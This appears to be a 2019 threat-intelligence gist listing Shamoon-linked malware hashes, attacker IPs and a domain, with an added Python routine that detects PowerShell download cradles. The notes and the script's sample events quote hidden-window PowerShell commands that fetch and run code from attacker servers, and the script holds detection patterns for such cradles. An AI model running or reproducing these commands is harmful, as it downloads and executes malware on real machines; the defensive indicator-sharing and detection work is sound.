@Blevene Blevene/QuickNotes
Created Jul 2, 2019

Cyber July 2nd 2019 Quick Notes
CyberCom
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536
https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited))
b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet, 2017-01-14 03:35Z
> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
> Powershell: http://69.87.223.26:8080/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')"
> Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb
> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2
f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell
28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z
> http://139.59.46.154:3485/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')"
> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai
> Downloader for PuPy
> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/
0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector
dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader
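The two Powermet entries above share one shape: an Office document spawns PowerShell with a hidden window, non-interactive, no profile, and `iex` evaluating text pulled by `DownloadString` from a hard-coded IP. The triage routine below is an added example (not code from the gist or from CyberCom) that scores Sysmon-style process-creation events for exactly that shape and for contact with the network indicators in the notes. The field names (`Host`, `ParentImage`, `CommandLine`), the hostnames, the parent paths and the benign command lines are constructed; the IPs and the domain are the ones listed above.

```python
"""Triage Windows process-creation events for the PowerShell download cradle
noted above (hidden window, non-interactive, no profile, iex + DownloadString)
and for contact with the network indicators in the notes.

Added example, not code from the gist. Events use Sysmon-style field names
(Host, ParentImage, CommandLine); the hosts, parent paths and the benign
command lines are constructed, the indicators are copied from the notes.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Network indicators listed in the notes above.
KNOWN_INDICATORS = {
    "69.87.223.26", "139.59.46.154", "139.49.46.154",
    "37.220.6.115", "customermgmt.net",
}

# A PowerShell child of an Office process matches the chain in the notes
# (source document -> PowerShell cradle -> Pupy payload).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Cradle traits matched against the command line. Each regex accepts the
# abbreviated switches seen in the notes (-w, -noni, -nop) and the long forms
# PowerShell also accepts (-WindowStyle, -NonInteractive, -NoProfile).
CRADLE_TRAITS = [
    ("hidden-window",      re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("non-interactive",    re.compile(r"-noni(?:nteractive)?\b", re.I)),
    ("no-profile",         re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("invoke-expression",  re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("webclient-download", re.compile(r"net\.webclient|downloadstring|downloadfile", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


@dataclass
class Finding:
    host: str
    parent: str
    traits: list
    urls: list
    indicator_hits: list
    score: int

    @property
    def is_cradle(self) -> bool:
        # The defining pair: fetch remote script text, then evaluate it in memory.
        return "invoke-expression" in self.traits and "webclient-download" in self.traits


def analyse_event(event: dict) -> Finding:
    """Score one process-creation event; higher means more cradle-like."""
    cmd = event["CommandLine"]
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    traits = [name for name, pat in CRADLE_TRAITS if pat.search(cmd)]
    if parent in OFFICE_PARENTS:
        traits.append("office-parent")
    urls = URL_RE.findall(cmd)
    hosts = {urlparse(u).hostname for u in urls}
    hits = sorted(h for h in hosts if h in KNOWN_INDICATORS)
    # One point per trait, three per contact with a known indicator.
    score = len(traits) + 3 * len(hits)
    return Finding(event["Host"], parent, traits, urls, hits, score)


def triage(events) -> list:
    """Keep events that are cradles or touch a known indicator, highest score first."""
    flagged = [f for f in map(analyse_event, events) if f.is_cradle or f.indicator_hits]
    return sorted(flagged, key=lambda f: f.score, reverse=True)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; WS01 and WS03 reproduce the cradle from the notes
    {"Host": "WS01", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f'"{PS}" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient)'
                    ".DownloadString('http://69.87.223.26:8080/eiloShaegae1')\""},
    {"Host": "WS02", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{PS}" -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1'},
    {"Host": "WS03", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": f'"{PS}" -NonInteractive -NoProfile -WindowStyle Hidden -Command '
                    "\"IEX (New-Object Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')\""},
    {"Host": "WS04", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f'"{PS}" -nop -c "Invoke-WebRequest https://customermgmt.net/page/news -OutFile C:\\Users\\Public\\n.exe"'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host}: score={f.score} cradle={f.is_cradle} parent={f.parent} "
              f"traits={f.traits} indicators={f.indicator_hits}")
```

The cradle verdict rests only on the `iex` + download pair, because that is what the technique needs; the other switches and the Office parent raise the score so an analyst sees the full-shape cases first. WS04 has none of the cradle traits but still surfaces through the indicator match, which is the second path a note like this supports once the hashes and addresses have been loaded into a watchlist.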
@Blevene (Owner, Author) commented Jul 2, 2019:

Activity falls under "magichound" https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/

There is some contention as to whether this actor fits into APT33 or not.

@Blevene (Owner, Author) commented Jul 2, 2019:

Interesting tweets from friends:
https://twitter.com/obiwanblee/status/1146152208976584704

Associated sample is fdae4a166decf212ef9429a4fb95c60e
which is consistent with the use of the tool RULER. Related binary (2c0ade3a01d6318861d54ce94faca006) is an AutoIT executable likely used to download additional tools from hxxps://customermgmt[.]net/page/news #apt33
